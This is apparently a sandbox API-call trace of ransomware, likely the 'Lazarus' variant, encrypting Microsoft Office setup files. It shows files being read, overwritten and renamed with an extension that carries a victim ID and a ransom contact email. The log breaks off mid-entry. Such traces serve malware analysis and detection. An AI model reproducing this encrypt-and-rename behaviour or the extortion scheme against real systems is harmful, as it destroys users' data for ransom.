[0086.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0086.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0086.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0086.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0086.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0086.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0086.244] AreFileApisANSI () returned 1 [0086.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0086.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0086.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 92 [0086.244] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e1fe00, ftCreationTime.dwHighDateTime=0x1d0d79d, ftLastAccessTime.dwLowDateTime=0xd9ff8cc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x69e1fe00, ftLastWriteTime.dwHighDateTime=0x1d0d79d, nFileSizeHigh=0x0, nFileSizeLow=0x168258)) returned 1 [0086.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.244] AreFileApisANSI () returned 1 [0086.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0086.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0086.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0086.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0086.244] GetLastError () returned 0x0 [0086.244] SetLastError (dwErrCode=0x0) [0086.244] AreFileApisANSI () returned 1 [0086.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0086.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0086.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 92 [0086.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.245] GetFileType (hFile=0x424) returned 0x1 [0086.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.245] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0086.245] ReadFile (in: hFile=0x424, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0086.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0086.247] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0086.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0086.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0086.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e298 [0086.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x53970 [0086.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c058 [0086.249] GetLastError () returned 0x0 [0086.249] SetLastError (dwErrCode=0x0) [0086.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0086.249] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0086.249] WriteFile (in: hFile=0x424, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0086.249] WriteFile (in: hFile=0x424, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0086.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0086.250] CloseHandle (hObject=0x424) returned 1 [0086.578] AreFileApisANSI () returned 1 [0086.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0086.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0086.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 92 [0086.579] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.579] GetFileType (hFile=0x424) returned 0x1 [0086.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.579] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0086.579] ReadFile (in: hFile=0x424, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0086.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x570e0 [0086.580] ReadFile (in: hFile=0x424, lpBuffer=0x570e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0086.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e2d0 [0086.580] GetLastError () returned 0x0 [0086.580] SetLastError (dwErrCode=0x0) [0086.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0086.580] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0086.580] WriteFile (in: hFile=0x424, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0086.581] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0086.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x570e0 | out: hHeap=0x20000) returned 1 [0086.581] CloseHandle (hObject=0x424) returned 1 [0086.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x5f2c8 [0086.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.622] AreFileApisANSI () returned 1 [0086.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0086.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0086.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 92 [0086.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5f2c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0086.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x134) returned 0x5e870 [0086.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5f2c8, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=154 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 154 [0086.623] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0086.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0086.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0086.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0086.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0086.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53970 | out: hHeap=0x20000) returned 1 [0086.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c058 | out: hHeap=0x20000) returned 1 [0086.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0086.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0086.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0086.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0086.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0086.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.800] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e1fe00, ftCreationTime.dwHighDateTime=0x1d0d79d, ftLastAccessTime.dwLowDateTime=0xda982389, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x69e1fe00, ftLastWriteTime.dwHighDateTime=0x1d0d79d, nFileSizeHigh=0x0, nFileSizeLow=0x902bb, dwReserved0=0x2adeaa23, dwReserved1=0xd51c015d, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0086.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x80a30 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0086.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89810 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0086.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89810 | out: hHeap=0x20000) returned 1 [0086.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0086.802] AreFileApisANSI () returned 1 [0086.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms", lpUsedDefaultChar=0x0) returned 105 [0086.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0086.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0086.802] AreFileApisANSI () returned 1 [0086.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0086.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0086.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 105 [0086.922] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.923] GetFileType (hFile=0x424) returned 0x1 [0086.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.924] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0086.924] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0086.924] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0086.924] CloseHandle (hObject=0x424) returned 1 [0086.924] AreFileApisANSI () returned 1 [0086.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0086.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0086.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 105 [0086.924] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.925] GetFileType (hFile=0x424) returned 0x1 [0086.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.925] CloseHandle (hObject=0x424) returned 1 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: 